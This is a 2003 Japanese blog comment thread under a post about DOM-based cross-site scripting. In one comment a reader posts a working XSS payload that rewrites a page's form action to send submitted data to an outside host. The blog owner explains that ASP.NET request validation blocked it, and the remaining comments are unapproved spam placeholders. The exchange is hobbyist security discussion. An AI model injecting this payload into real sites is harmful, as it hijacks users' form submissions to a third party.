「DOM万歳(XSS大王つづき)」へのコメント
「水無月ばけらのえび日記 : DOM万歳(XSS大王つづき)」について、29件のコメントが書かれています。
[135] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時12分)
なんかタグを含む投稿で? エラーになります。再挑戦
"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span
[136] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時15分)
なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。
http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351
[137] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時52分)
>なぜかここに投稿しようとするとエラーになるので
どんなエラーが出ていましたか?
実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。
[138] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時56分)
>>なぜかここに投稿しようとするとエラーになるので
調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。
================
危険な可能性のある Request.Form 値がクライアントから検出されました。
説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。
例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。
================
この機能はオフにできるはずなので、ちょっと調べてみます。
[3769] 未承認メッセージ (投稿元:220.80.30.43)
reogkzt lyrqnhj (2006年7月25日 17時21分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[3797] 未承認メッセージ (投稿元:58.233.138.152)
ncwevljtm vkhc (2006年8月17日 7時50分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[5951] 未承認メッセージ (投稿元:193.105.210.162)
xagXyLMau (2010年8月12日 11時38分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6066] 未承認メッセージ (投稿元:91.201.66.142)
HkETbRYnetyRsrNAEuJ (2010年9月4日 23時43分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6131] 未承認メッセージ (投稿元:91.214.45.223)
heaqeexvplb (2010年9月27日 11時5分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6135] 未承認メッセージ (投稿元:91.214.44.123)
ABJnpMofGhbiKjjcCp (2010年9月28日 14時47分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6149] 未承認メッセージ (投稿元:213.5.64.15)
SAYTlwwEsGsf (2010年10月2日 7時11分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6190] 未承認メッセージ (投稿元:213.5.64.15)
PCixjbZtHANSY (2010年10月9日 21時47分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6210] 未承認メッセージ (投稿元:213.5.64.15)
fbfkxAHExeYKSBQI (2010年10月15日 21時8分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6283] 未承認メッセージ (投稿元:94.102.49.76)
WXOOUviJbRTYLKfm (2010年11月23日 8時38分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6397] 未承認メッセージ (投稿元:79.142.69.75)
iDIFbwzWXDOom (2011年2月3日 6時20分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6528] 未承認メッセージ (投稿元:67.23.249.241)
kHvAopTTJohptPfoNs (2011年3月29日 8時11分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[6631] 未承認メッセージ (投稿元:212.129.66.131)
GYwiNtXHTqNroQU (2011年6月1日 21時36分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
「水無月ばけらのえび日記 : DOM万歳(XSS大王つづき)」についてコメントを書く場合は、以下のフォームに記入してください。